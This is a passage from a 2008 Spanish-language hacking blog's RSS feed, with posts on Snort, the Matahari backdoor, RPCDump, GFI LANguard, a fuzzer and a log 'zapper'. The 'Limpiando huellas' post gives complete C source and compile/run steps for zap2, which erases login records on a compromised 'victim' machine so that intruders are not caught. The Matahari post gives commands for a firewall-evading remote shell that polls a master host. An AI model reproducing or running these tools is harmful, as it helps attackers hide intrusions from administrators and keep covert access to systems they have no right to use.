border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=48&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/11/montando-un-servidor-ftp-pure-ftpd-en-linux/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>

		<media:content url="http://www.pureftpd.org/images/pure-ftpd.png" medium="image" />
	</item>
		<item>
		<title>Snort Detectando intrusos</title>
		<link>http://backtrackworld.wordpress.com/2008/09/10/snort-detectando-intrusos/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/10/snort-detectando-intrusos/#comments</comments>
		<pubDate>Wed, 10 Sep 2008 10:47:28 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Misc]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=44</guid>
		<description><![CDATA[Snort es un sistema de intrusión y detección de intrusos en redes informaticas, es un programa de código abierto muy potente, usado tanto domésticamente como en el ámbito de seguridad empresarial. Es gratuito y podéis descargarlo de su página oficial.snort.org<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=44&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.snort.org/"><img src="http://www.snort.org/images/snort_org_03.jpg" border="0" alt="the de facto standard in IPS" width="217" height="109" /></a> Snort es un sistema de intrusión y detección de intrusos en redes informaticas, es un programa de código abierto muy potente, usado tanto domésticamente como en el ámbito de seguridad empresarial.</p>
<p style="text-align:center;">Es gratuito y podéis descargarlo de su página oficial.<a href="http://snort.org">snort.org</a><a></a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/44/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/44/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/44/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=44&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/10/snort-detectando-intrusos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>

		<media:content url="http://www.snort.org/images/snort_org_03.jpg" medium="image">
			<media:title type="html">the de facto standard in IPS</media:title>
		</media:content>
	</item>
		<item>
		<title>Limpiando huellas</title>
		<link>http://backtrackworld.wordpress.com/2008/09/09/limpiando-huellas/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/09/limpiando-huellas/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 21:43:14 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Misc]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=38</guid>
		<description><![CDATA[Esto lo vamos a hacer con un zapper , un zapper es un programa que al ejecutarlo en la maquina remota limpia el log que queda guandado con todo lo que hicimos en la maquina victima. Si no limpias la mugre que dejas estas ******, ya ke si el root revisa los logs vera tu [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=38&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img src="http://img.xataka.com/2007/12/huella.jpg" alt="http://img.xataka.com/2007/12/huella.jpg" width="89" height="116" /> Esto lo vamos a hacer con un zapper , un zapper es un programa que al ejecutarlo en la maquina remota limpia el log que queda guandado con todo lo que hicimos en la maquina victima.</p>
<p>Si no limpias la mugre que dejas estas ******, ya ke si el root revisa los logs vera tu IP y todo lo ke has hecho. Si te agarran despues no me digas que no avise.</p>
<p>Pero donde esta el probema de esto, y bueno les comento que el problema de esto es que para borrar lo que hiciste tenes que ser roort.</p>
<p>Los logs mas importantes son:</p>
<p>_ UTMP &#8211; Indika quien esta konectado en cada momento.</p>
<p>_ WTMP &#8211; Indica todas las entradas y salidas de la maquina victima indicando el tty y el host.</p>
<p>_ LASTLOG &#8211; Guarda un log indicando el momento exacto en el ce se konekto el usuario por ultima vez.</p>
<p>_ ACCT &#8211; Guarda todos los comandos ejekutados por los usuarios (aunke sin argumentos) y como los ponemos.</p>
<p>Me llevo casi 3 horas averiguar esto asi que me imagino que algun dia lo van a utilizar, si es que entran en algun ordenador alguna vez.</p>
<p>Estos logs estan ubicados en los siguientes directorios.</p>
<p>_ UTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log</p>
<p>_ WTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log</p>
<p>_ LASTLOG : /usr/var/adm o /usr/adm o /var/adm o /var/log</p>
<p>_ ACCT : /var/adm/acct (en algunos sistemas se puede llamar pacct)</p>
<p>Esto varia de sistema en sistema.</p>
<p>Los zappers lo que hacen la mayoria es borrar el log acct , de esta forma estamos salvados de que nos agarren ya que sabran que estubimos dentro pero no pueden saber que hicimos. Por eso es bueno acompaÃ±arlo con algun metodo de anonimato que ya sabran.</p>
<p>Lo que voy a enseÃ±ar a usar es el zap2 un zapper que es muy fasil de detectar si es que se quiere, lo que hace este no borrar los logs sino dejarlos en 0 , y tampoco borra el acct pero tambien lo deja en 0 asi que no tendremos problemas graves, siempre y cuando no se manden una ****** grosa en la maquina y le den ganas al admin de saber quien fue. Le va a costar pero no va a ser tan fasil como dejarle el numero de documento en el log.</p>
<p>En este tuto vamos a matar 2 pajaros de un tiro. Uno es aprender a compilar exploits y otro aprender a ejecutarlos. Obvio que este es de uso local, es decir hay que ejecutarlo desde la shell del sistema que queremos limpiar.</p>
<p>Pasamos a crear el archivo zap2.c de esta forma.</p>
<p>[root@localhost phantomlord]# cat &gt; zap2.c</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;copiamos el code&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<div class="codeheader">Código:</div>
<div class="code">
<pre style="margin-top:0;display:inline;">#include &lt;sys/types.h&gt;
#include &lt;stdio.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/file.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;utmp.h&gt;
#include &lt;pwd.h&gt;
#include &lt;lastlog.h&gt;
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

  if ((f=open(UTMP_NAME,O_RDWR))&gt;=0) {
     while(read (f, &amp;utmp_ent, sizeof (utmp_ent))&gt; 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&amp;utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &amp;utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}

void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))&gt;=0) {

     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &amp;utmp_ent, sizeof (struct utmp))&lt;0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&amp;utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &amp;utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

     if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open(LASTLOG_NAME, O_RDWR)) &gt;= 0) {
            lseek(f, (long)pwd-&gt;pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&amp;newll,sizeof( newll ));
            write(f, (char *)&amp;newll, sizeof( newll ));
            close(f);
        }

    } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}</pre>
</div>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;termino zap2&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>apretamos ctrl +z para terminar</p>
<p>[15]+ Stopped cat &gt;zap2.c</p>
<p>[root@localhost phantomlord]#</p>
<p>Ahora lo compilamos</p>
<p>[root@localhost phantomlord]# gcc zap2.c -o zap2</p>
<p>El archivo compilado (programa) se va a llamar zap2</p>
<p>y ahora lo ejecutamos de esta manera.</p>
<p>[root@localhost phantomlord]# ./zap2</p>
<p>Listo&#8230;ya limpie la mierda&#8230;hdl rulez!</p>
<p>[root@localhost phantomlord]#</p>
<p>Como ven nos avisa si funciono o no quiero aclarar que se puede usar de las siguientes formas.</p>
<p>[root@localhost phantomlord]# ./zap2 nombreusuario</p>
<p>o simplemente</p>
<p>[root@localhost phantomlord]# ./zap2</p>
<p>Que borrara los logs del usuario que estemos usando en ese momento.</p>
<p>Espero que les sirva esto. Hasta la vista baby.</p>
<p>Phantom Lord.</p>
<p>Salu2</p>
<p>Fuente &#8211;&gt;  <a href="http://www.hackersdelocos.com.ar/foro/index.php/topic,544.0.html">Hackersdelocos</a></p>
<p>Escrito por &#8211;&gt; Phantom Lord</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/38/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/38/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/38/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/38/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/38/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=38&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/09/limpiando-huellas/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>

		<media:content url="http://img.xataka.com/2007/12/huella.jpg" medium="image">
			<media:title type="html">http://img.xataka.com/2007/12/huella.jpg</media:title>
		</media:content>
	</item>
		<item>
		<title>Matahari Backtrack 3</title>
		<link>http://backtrackworld.wordpress.com/2008/09/09/matahari-backtrack-3/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/09/matahari-backtrack-3/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 02:25:06 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Backdoors]]></category>
		<category><![CDATA[Penetración]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=33</guid>
		<description><![CDATA[Es un script escrito en Python para mantener una básica shell remota en sistemas detrás de un firewall. El cliente adquiere comandos. El cliente consigue órdenes de vez en cuando sondeando al servidor y envía la salida atrás después de la ejecución de ellos. El tráfico atraviesa el cortafuegos como HTTP estándar saliente HTTP GET/POST [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=33&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Es un script escrito en Python para mantener una básica shell remota en sistemas detrás de un firewall. El cliente adquiere comandos. El cliente consigue órdenes de vez en cuando sondeando al servidor y envía la salida atrás después de la ejecución de ellos. El tráfico atraviesa el cortafuegos como HTTP estándar saliente HTTP GET/POST requests. HTTP requests/responsesllevan la carga útil b64 codificado. El cifrado opcional es apoyado (y sumamente recomendado)</p>
<p style="text-align:center;"><a class="external free" title="http://matahari.sourceforge.net" rel="nofollow" href="http://matahari.sourceforge.net/"><img class="aligncenter" src="http://www.southwestchevy.com/images/milk_backdoors_large.jpg" alt="http://www.southwestchevy.com/images/milk_backdoors_large.jpg" /></a></p>
<h2>Ejemplos</h2>
<p>Supongamos que tienes un sistema objetivo ej: objetivo.foo.com detrás de un firewall y quieres ejecutar comandos desde un administrador admin.foo.com, sería lo siguiente:</p>
<ol>
<li>Ejecutar en la máquina objetivo:<strong><span style="text-align:center;"><span style="font-family:Courier New,Courier,monospace;">./matahari.py -c     master.bar.com -T polite</span></span></strong><span style="text-align:center;">.</span>Cercionate de mantener el proceson ejecutado siempre antes de  desconectar</li>
<li>Ejecutar en cualquier momento en la maquina admin:<strong><span style="font-family:Courier New,Courier,monospace;"><span style="text-align:center;">./matahari.py -s     target.foo.com</span></span></strong></li>
</ol>
<p style="text-align:center;">Más información en : <a class="external free" title="http://matahari.sourceforge.net" rel="nofollow" href="http://matahari.sourceforge.net/">http://matahari.sourceforge.net</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/33/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/33/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/33/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/33/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/33/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=33&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/09/matahari-backtrack-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>

		<media:content url="http://www.southwestchevy.com/images/milk_backdoors_large.jpg" medium="image">
			<media:title type="html">http://www.southwestchevy.com/images/milk_backdoors_large.jpg</media:title>
		</media:content>
	</item>
		<item>
		<title>RPCDump en Backtrack 3</title>
		<link>http://backtrackworld.wordpress.com/2008/09/09/rpcdump-en-backtrack-3/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/09/rpcdump-en-backtrack-3/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 02:14:06 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Penetración]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=28</guid>
		<description><![CDATA[RPCDump es un programa el cual proporciona un acceso por consola a la RPC APis en Windows Más información la podemos encontrar en: cultdeadcow<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=28&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>RPCDump es un programa el cual proporciona un acceso por consola a la RPC APis en Windows</p>
<p style="text-align:center;"><img src="http://noticiastech.com/wordpress/wp-content/uploads/2007/04/virus.jpg" alt="http://noticiastech.com/wordpress/wp-content/uploads/2007/04/virus.jpg" width="188" height="140" /></p>
<p style="text-align:center;">Más información la podemos encontrar en:<a href="http://www.cultdeadcow.com/tools/rpcdump.php"> cultdeadcow</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/28/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/28/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/28/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=28&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/09/rpcdump-en-backtrack-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>

		<media:content url="http://noticiastech.com/wordpress/wp-content/uploads/2007/04/virus.jpg" medium="image">
			<media:title type="html">http://noticiastech.com/wordpress/wp-content/uploads/2007/04/virus.jpg</media:title>
		</media:content>
	</item>
		<item>
		<title>GFI LanGuard 2.0 Backtrack 3</title>
		<link>http://backtrackworld.wordpress.com/2008/09/09/gfi-languard-20-backtrack-3/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/09/gfi-languard-20-backtrack-3/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 02:04:43 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Auditorias]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=25</guid>
		<description><![CDATA[GFI LANguard Network Security Scanner (N.S.S.) comprueba tu red con todos los metodos que los hackers utilizan para atacar. Analizando el sistema operativo y los programas que estan ejecutandose, GFI LANguard N.S.S. identifica posibles agujeros de seguridad. Mas información en: http://www.gfi.com/lannetscan/<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=25&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>GFI LANguard Network Security Scanner (N.S.S.) comprueba tu red con todos los metodos que los hackers utilizan para atacar. Analizando el sistema operativo y los programas que estan ejecutandose, GFI LANguard N.S.S. identifica posibles agujeros de seguridad.</p>
<p><a href="http://www.gfi.com/"><img src="http://www.gfi.com/images/gfi_logos/lg_gfi.gif" border="0" alt="GFI" hspace="10" width="70" height="28" /></a></p>
<p>Mas información en: <a class="external free" title="http://www.gfi.com/lannetscan/" rel="nofollow" href="http://www.gfi.com/lannetscan/">http://www.gfi.com/lannetscan/</a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/backtrackworld.wordpress.com/25/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/backtrackworld.wordpress.com/25/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/backtrackworld.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/backtrackworld.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/backtrackworld.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/backtrackworld.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/backtrackworld.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/backtrackworld.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/backtrackworld.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/backtrackworld.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/backtrackworld.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/backtrackworld.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/backtrackworld.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/backtrackworld.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/backtrackworld.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/backtrackworld.wordpress.com/25/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=25&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://backtrackworld.wordpress.com/2008/09/09/gfi-languard-20-backtrack-3/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/35c05793b6bcf899b86d8eef15cfb712?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">root@Aquiles:~#</media:title>
		</media:content>

		<media:content url="http://www.gfi.com/images/gfi_logos/lg_gfi.gif" medium="image">
			<media:title type="html">GFI</media:title>
		</media:content>
	</item>
		<item>
		<title>Fuzzer 1.2 de Backtrack 3</title>
		<link>http://backtrackworld.wordpress.com/2008/09/09/fuzzer-12-de-backtrack-3/</link>
		<comments>http://backtrackworld.wordpress.com/2008/09/09/fuzzer-12-de-backtrack-3/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 01:52:09 +0000</pubDate>
		<dc:creator>root@Aquiles:~#</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://backtrackworld.wordpress.com/?p=20</guid>
		<description><![CDATA[El &#8220;Fuzzing&#8221; es un software automatico que testea técnicas que generan y envian secuencias de datos aleatorias a varias areas de una aplicación oara intentar encontrar vulnerabilidades. Por ejemplo, cuando buscamos &#8220;buffers overflows&#8221; un testeados simplemente puede generar datos de varios tamaños y mandarlos a una aplicación para observar como la aplicación falla. Ejemplo (string [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=backtrackworld.wordpress.com&amp;blog=4765852&amp;post=20&amp;subd=backtrackworld&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>El &#8220;Fuzzing&#8221; es un software automatico que testea técnicas que generan y envian secuencias de datos aleatorias a varias areas de una aplicación oara intentar encontrar vulnerabilidades.</p>
<p>Por ejemplo, cuando buscamos &#8220;buffers overflows&#8221; un testeados simplemente puede generar datos de varios tamaños y mandarlos a una aplicación para observar como la aplicación falla.</p>
<p>Ejemplo (string overflow):<br />
<em> fuzz.pl -host 192.168.1.2 -port 80 -type string -load template.txt</em></p>
<p>Creando el template:</p>
<p>Crea un archivo donde pongas cualquier petición o &#8220;request&#8221;, y el lugar donde quieres que el Fuzz inserte el tag &lt;FUZZER&gt;, si necesitas calcular el tamaño de los datos ej: como un POST request en un servidor HTTP usa los tags &lt;COUNT&gt;data&lt;COUNT&gt; and &lt;SIZE&gt; Deberá acabar como el siguiente:</p>
<p><em> POST /cgi-sys/FormMail.cgi HTTP/1.1<br />
Host: 127.0.0.1<br />
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)<br />
Keep-Alive: 300<br />
Connection: keep-alive<br />
Referer: http://127.0.0.1/<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: &lt;SIZE&gt;</em></p>
<p><em>&lt;COUNT&gt;recipient=test%40127.0.0.1&amp;subject=Fuzzing&amp;Name=test &amp;email=test%40localhost&amp; request=test&lt;FUZZER&gt;&amp;redirect=/&lt;COUNT&gt;</em></p>
<p>Puedes usar valores hexadecimales como \x41 or 0&#215;41 en la plantilla o &#8220;template&#8221; si el protocolo es binario.</p>
<p>Fuente &#8211;&gt; <a href="http://www.securiteam.com/tools/5TP012AHFU.html">Securityteam</a></p>
<p>Traducido por : Achilles</p>
